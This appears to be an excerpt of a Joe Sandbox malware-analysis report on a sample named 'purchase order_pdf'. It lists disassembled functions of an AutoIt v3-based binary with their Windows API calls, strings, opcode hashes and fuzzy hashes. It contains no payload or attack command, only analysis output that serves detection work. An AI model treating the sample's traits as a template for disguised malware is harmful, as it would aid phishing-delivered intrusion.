Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 72fb07ad6161efe87851bfdddf6d1ddaf37a2ba5eb2ec9f072a5f3e878da413e
Instruction ID: f4ad4998f36e02f63a8c13ff56677227096e8204887ffee10c0748612be6e29e
Opcode Fuzzy Hash: 72fb07ad6161efe87851bfdddf6d1ddaf37a2ba5eb2ec9f072a5f3e878da413e
Instruction Fuzzy Hash: 72023871900119AFDB14DFA9CC89EAE7BB9FF49310F148158FA15EB2A1CB70AD01CB60

Function 008F37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,008FF910), ref: 008F38AF
IsWindowVisible.USER32(?), ref: 008F38D3

Strings

TABLEFT, xrefs: 008F390F
DELSTRING, xrefs: 008F39D1
ISCHECKED, xrefs: 008F3AC1
TABRIGHT, xrefs: 008F3925
SELECTSTRING, xrefs: 008F3A8E
SENDCOMMANDID, xrefs: 008F3C62
ISENABLED, xrefs: 008F38F3
SHOWDROPDOWN, xrefs: 008F3968
ISVISIBLE, xrefs: 008F38BF
SETCURRENTSELECTION, xrefs: 008F3A3E
GETLINE, xrefs: 008F3C23
CHECK, xrefs: 008F3AF5
GETLINECOUNT, xrefs: 008F3B4E
GETCURRENTCOL, xrefs: 008F3BB0
UNCHECK, xrefs: 008F3B0B
HIDEDROPDOWN, xrefs: 008F3988
EDITPASTE, xrefs: 008F3BE7
CURRENTTAB, xrefs: 008F3945
ADDSTRING, xrefs: 008F399E
FINDSTRING, xrefs: 008F39FE
GETCURRENTSELECTION, xrefs: 008F3A6B
GETCURRENTLINE, xrefs: 008F3B75
GETSELECTED, xrefs: 008F3B2B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 6ce7ad2c2bfb8b82a3e411a40ca25c074c1588dfe5fde21f6ed79a815a114e33
Instruction ID: d0d693231ef005d0228b4bfed16dd1c5408dcce7552fdb10a80301a8e306d764
Opcode Fuzzy Hash: 6ce7ad2c2bfb8b82a3e411a40ca25c074c1588dfe5fde21f6ed79a815a114e33
Instruction Fuzzy Hash: 6FD14D30204319DBCB14EF28C451A7ABBE5FF94354F148558F986DB3A6CB35EA4ACB42

Function 008FA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 008FA89F
GetSysColorBrush.USER32(0000000F), ref: 008FA8D0
GetSysColor.USER32(0000000F), ref: 008FA8DC
SetBkColor.GDI32(?,000000FF), ref: 008FA8F6
SelectObject.GDI32(?,?), ref: 008FA905
InflateRect.USER32(?,000000FF,000000FF), ref: 008FA930
GetSysColor.USER32(00000010), ref: 008FA938
CreateSolidBrush.GDI32(00000000), ref: 008FA93F
FrameRect.USER32(?,?,00000000), ref: 008FA94E
DeleteObject.GDI32(00000000), ref: 008FA955
InflateRect.USER32(?,000000FE,000000FE), ref: 008FA9A0
FillRect.USER32(?,?,?), ref: 008FA9D2
GetWindowLongW.USER32(?,000000F0), ref: 008FA9FD

Part of subcall function 008FAB60: GetSysColor.USER32(00000012), ref: 008FAB99
Part of subcall function 008FAB60: SetTextColor.GDI32(?,?), ref: 008FAB9D
Part of subcall function 008FAB60: GetSysColorBrush.USER32(0000000F), ref: 008FABB3
Part of subcall function 008FAB60: GetSysColor.USER32(0000000F), ref: 008FABBE
Part of subcall function 008FAB60: GetSysColor.USER32(00000011), ref: 008FABDB
Part of subcall function 008FAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008FABE9
Part of subcall function 008FAB60: SelectObject.GDI32(?,00000000), ref: 008FABFA
Part of subcall function 008FAB60: SetBkColor.GDI32(?,00000000), ref: 008FAC03
Part of subcall function 008FAB60: SelectObject.GDI32(?,?), ref: 008FAC10
Part of subcall function 008FAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 008FAC2F
Part of subcall function 008FAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008FAC46
Part of subcall function 008FAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 008FAC5B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 4b57b66d4b401c3d7b83e415147e85c659744a79592a52a4517dad532fbc2a43
Instruction ID: c227d264ea1e9ec538ea6db45e4e3460906e8b1e3f40f43ba7732b906694ae8f
Opcode Fuzzy Hash: 4b57b66d4b401c3d7b83e415147e85c659744a79592a52a4517dad532fbc2a43
Instruction Fuzzy Hash: 2FA169B2008305AFD7159F74DC08E7BBBA9FF88331F104A29FA66D61A2D7719944CB52

Function 00872C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00872CA2
DeleteObject.GDI32(00000000), ref: 00872CE8
DeleteObject.GDI32(00000000), ref: 00872CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00872CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00872D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 008AC68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008AC6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008ACAED

Part of subcall function 00871B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00872036,?,00000000,?,?,?,?,008716CB,00000000,?), ref: 00871B9A

SendMessageW.USER32(?,00001053), ref: 008ACB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008ACB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008ACB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008ACB62

Strings

0, xrefs: 008AC981

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b630aaf4d923c5a821473dad98588916a5435d11bdea788315b6d04742ae62b6
Instruction ID: 9cb10ca56d6f4318e994bb63f2e3b081e9fabb0dd5cb99d95a14520e2832a9a0
Opcode Fuzzy Hash: b630aaf4d923c5a821473dad98588916a5435d11bdea788315b6d04742ae62b6
Instruction Fuzzy Hash: 7D12B030604205EFEB21CF28C884BA9BBE1FF56314F548569E599DB662CB31EC42DB91

Function 008E77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 008E77F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008E78B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008E78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008E7900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008E7946
GetClientRect.USER32(00000000,?), ref: 008E7952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008E7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008E79A5
GetStockObject.GDI32(00000011), ref: 008E79B5
SelectObject.GDI32(00000000,00000000), ref: 008E79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008E79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008E79D2
DeleteDC.GDI32(00000000), ref: 008E79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008E7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 008E7A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008E7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008E7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 008E7A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008E7AAE
GetStockObject.GDI32(00000011), ref: 008E7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008E7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008E7ACE

Strings

msctls_progress32, xrefs: 008E7A4F
static, xrefs: 008E7990, 008E7AA8
AutoIt v3, xrefs: 008E793E
DISPLAY, xrefs: 008E799B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 70c9a641d0632dfeeab164b74b086d59555da686146f1163945f8f795a5ae8a3
Instruction ID: e69e1cd532d55013a0b49aa4ef7a084a9335f81fbf9446dba85c320d8b464ed5
Opcode Fuzzy Hash: 70c9a641d0632dfeeab164b74b086d59555da686146f1163945f8f795a5ae8a3
Instruction Fuzzy Hash: 51A15C71A40219BFEB149BA8DC4AFAA7BA9FF45710F008114FA15E72E1DB74AD00CB64

Function 008DAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008DAF89
GetDriveTypeW.KERNEL32(?,008FFAC0,?,\\.\,008FF910), ref: 008DB066
SetErrorMode.KERNEL32(00000000,008FFAC0,?,\\.\,008FF910), ref: 008DB1C4

Strings

RAID, xrefs: 008DB162
SSA, xrefs: 008DB14D
CDROM, xrefs: 008DB09A
SCSI, xrefs: 008DB131
Unknown, xrefs: 008DB086, 008DB12A
SSD, xrefs: 008DB0F1
Fibre, xrefs: 008DB154
Removable, xrefs: 008DB0B8
1394, xrefs: 008DB146
USB, xrefs: 008DB15B
Network, xrefs: 008DB0A4
\\.\, xrefs: 008DAFDB
ATA, xrefs: 008DB13F
PhysicalDrive, xrefs: 008DB012
Virtual, xrefs: 008DB18C
ATAPI, xrefs: 008DB138
Fixed, xrefs: 008DB0AE
SAS, xrefs: 008DB170
FileBackedVirtual, xrefs: 008DB193
iSCSI, xrefs: 008DB169
SATA, xrefs: 008DB177
MMC, xrefs: 008DB185
RAMDisk, xrefs: 008DB090

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: d0ba9265fc323b6e56242af96df30686601f3c35bdbaed94ce3d1b0ca7038874
Instruction ID: 34ab6a1b5bec4f69916f03f582326faaa549964c6a4ff08f1b67d4a159cf1539
Opcode Fuzzy Hash: d0ba9265fc323b6e56242af96df30686601f3c35bdbaed94ce3d1b0ca7038874
Instruction Fuzzy Hash: 7851CD31A80209EBCF00EB24D992DBD73B5FB943497218227E42AE7395CB359D41DB47

Function 00876A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00876A91
__wcsnicmp.LIBCMT ref: 00876AA9
__wcsnicmp.LIBCMT ref: 00876AC1
__wcsnicmp.LIBCMT ref: 00876AD9
__wcsnicmp.LIBCMT ref: 00876AF1
__wcsnicmp.LIBCMT ref: 00876B09
__wcsnicmp.LIBCMT ref: 00876B21
__wcsnicmp.LIBCMT ref: 00876B35
__wcsnicmp.LIBCMT ref: 00876B76
__wcsnicmp.LIBCMT ref: 00876B8A
__wcsnicmp.LIBCMT ref: 00876B9E
__wcsnicmp.LIBCMT ref: 00876BB2

Strings

Unterminated group of comments, xrefs: 008AE82C
#include, xrefs: 00876B03
Cannot parse #include, xrefs: 008AE819
#notrayicon, xrefs: 00876AA3
#OnAutoItStartRegister, xrefs: 00876AD3
#pragma compile, xrefs: 00876A8B
#cs, xrefs: 00876B2F, 00876B84
#comments-start, xrefs: 00876B1B, 00876B70
#requireadmin, xrefs: 00876ABB
#comments-end, xrefs: 00876B98
Bad directive syntax error, xrefs: 008AE743
#ce, xrefs: 00876BAC
#include-once, xrefs: 00876AEB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 49b5cf4d43fabefe64870159f6a1ac5e42e825e617d644f421bb8d930eac5ea3
Instruction ID: e0137444a2c3d2d4885ceeddf88fab40a6d31979c451fb5d3b2ec929666fc8f4
Opcode Fuzzy Hash: 49b5cf4d43fabefe64870159f6a1ac5e42e825e617d644f421bb8d930eac5ea3
Instruction Fuzzy Hash: 21813C70604A15BBDF20BB64CC82FAE7798FF17714F088025F949EA1C6FB61DA51C262

Function 008FAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 008FAB99
SetTextColor.GDI32(?,?), ref: 008FAB9D
GetSysColorBrush.USER32(0000000F), ref: 008FABB3
GetSysColor.USER32(0000000F), ref: 008FABBE
CreateSolidBrush.GDI32(?), ref: 008FABC3
GetSysColor.USER32(00000011), ref: 008FABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 008FABE9
SelectObject.GDI32(?,00000000), ref: 008FABFA
SetBkColor.GDI32(?,00000000), ref: 008FAC03
SelectObject.GDI32(?,?), ref: 008FAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 008FAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008FAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 008FAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008FACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008FACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 008FACEC
DrawFocusRect.USER32(?,?), ref: 008FACF7
GetSysColor.USER32(00000011), ref: 008FAD05
SetTextColor.GDI32(?,00000000), ref: 008FAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 008FAD21
SelectObject.GDI32(?,008FA869), ref: 008FAD38
DeleteObject.GDI32(?), ref: 008FAD43
SelectObject.GDI32(?,?), ref: 008FAD49
DeleteObject.GDI32(?), ref: 008FAD4E
SetTextColor.GDI32(?,?), ref: 008FAD54
SetBkColor.GDI32(?,?), ref: 008FAD5E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 4224c1f53220ef26772515c160ccee8099ada712217f5bcea96539f922b690b9
Instruction ID: 4a159032cb19f0636cbfb7c86070353bc1e4affd01af1fe5ce8e9f4e11395764
Opcode Fuzzy Hash: 4224c1f53220ef26772515c160ccee8099ada712217f5bcea96539f922b690b9
Instruction Fuzzy Hash: EA611CB1900218EFDB159FB8DC48EBE7B79FF08320F244525FA15EB2A2D6759940DB90

Function 008F8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008F8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008F8D45
CharNextW.USER32(0000014E), ref: 008F8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008F8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008F8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008F8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 008F8DF9
SetWindowTextW.USER32(?,0000014E), ref: 008F8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 008F8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 008F8E8C
_memset.LIBCMT ref: 008F8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 008F8EFA
_memset.LIBCMT ref: 008F8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 008F8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 008F8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 008F9088
InvalidateRect.USER32(?,00000000,00000001), ref: 008F90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008F90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008F9121
DrawMenuBar.USER32(?), ref: 008F9130
SetWindowTextW.USER32(?,0000014E), ref: 008F9158

Strings

0, xrefs: 008F90C2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: ad0ea9fcc94ae63f1bd272749d3aa19523d8b37f42a10dc7394263258f4bfbb0
Instruction ID: 9beadc3516f549b12ab76b122cd38fd043be7ba7664909d59d0db2e464e34287
Opcode Fuzzy Hash: ad0ea9fcc94ae63f1bd272749d3aa19523d8b37f42a10dc7394263258f4bfbb0
Instruction Fuzzy Hash: 92E15B7090020DAADF209F64CC88EFE7BB9FF05714F108165FA15EA291DB748A81DF61

Function 008F4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 008F4C51
GetDesktopWindow.USER32 ref: 008F4C66
GetWindowRect.USER32(00000000), ref: 008F4C6D
GetWindowLongW.USER32(?,000000F0), ref: 008F4CCF
DestroyWindow.USER32(?), ref: 008F4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008F4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008F4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008F4D68
SendMessageW.USER32(?,00000421,?,?), ref: 008F4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008F4D90
IsWindowVisible.USER32(?), ref: 008F4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 008F4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 008F4DDF
GetWindowRect.USER32(?,?), ref: 008F4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 008F4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 008F4E37
CopyRect.USER32(?,?), ref: 008F4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 008F4EB9

Strings

tooltips_class32, xrefs: 008F4D1D
0, xrefs: 008F4BFC
(, xrefs: 008F4E2A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 273231ff2a19a10f2fd13501f3b1acf955da5403bf0b1e9a6fad910fb8903cbb
Instruction ID: 9db85f6c0847d7de7a18daa91d8d418f307c75f5dd027110709ca7e037ca976f
Opcode Fuzzy Hash: 273231ff2a19a10f2fd13501f3b1acf955da5403bf0b1e9a6fad910fb8903cbb
Instruction Fuzzy Hash: C2B14971604345AFDB04DF78C844A6BBBE4FF88314F008919F699DB2A2DB75E804CB52

Function 008727D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008728BC
GetSystemMetrics.USER32(00000007), ref: 008728C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008728EF
GetSystemMetrics.USER32(00000008), ref: 008728F7
GetSystemMetrics.USER32(00000004), ref: 0087291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00872939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00872949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0087297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00872990
GetClientRect.USER32(00000000,000000FF), ref: 008729AE
GetStockObject.GDI32(00000011), ref: 008729CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 008729D5

Part of subcall function 00872344: GetCursorPos.USER32(?), ref: 00872357
Part of subcall function 00872344: ScreenToClient.USER32(009367B0,?), ref: 00872374
Part of subcall function 00872344: GetAsyncKeyState.USER32(00000001), ref: 00872399
Part of subcall function 00872344: GetAsyncKeyState.USER32(00000002), ref: 008723A7

SetTimer.USER32(00000000,00000000,00000028,00871256), ref: 008729FC

Strings

AutoIt v3 GUI, xrefs: 00872974

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 87f4e5c04fd53ade9f4fc2fd61c9f295265d340791b8396069dfef0d7303020a
Instruction ID: 7db1cbfa630c6b7de7097de74d412a86287ce81e0d41c33272505ce2abbfbc5f
Opcode Fuzzy Hash: 87f4e5c04fd53ade9f4fc2fd61c9f295265d340791b8396069dfef0d7303020a
Instruction Fuzzy Hash: 0CB14A71A0020AAFDB14DFA8DC45BAE7BB4FB08315F108229FA19E6294DB74E850CF51

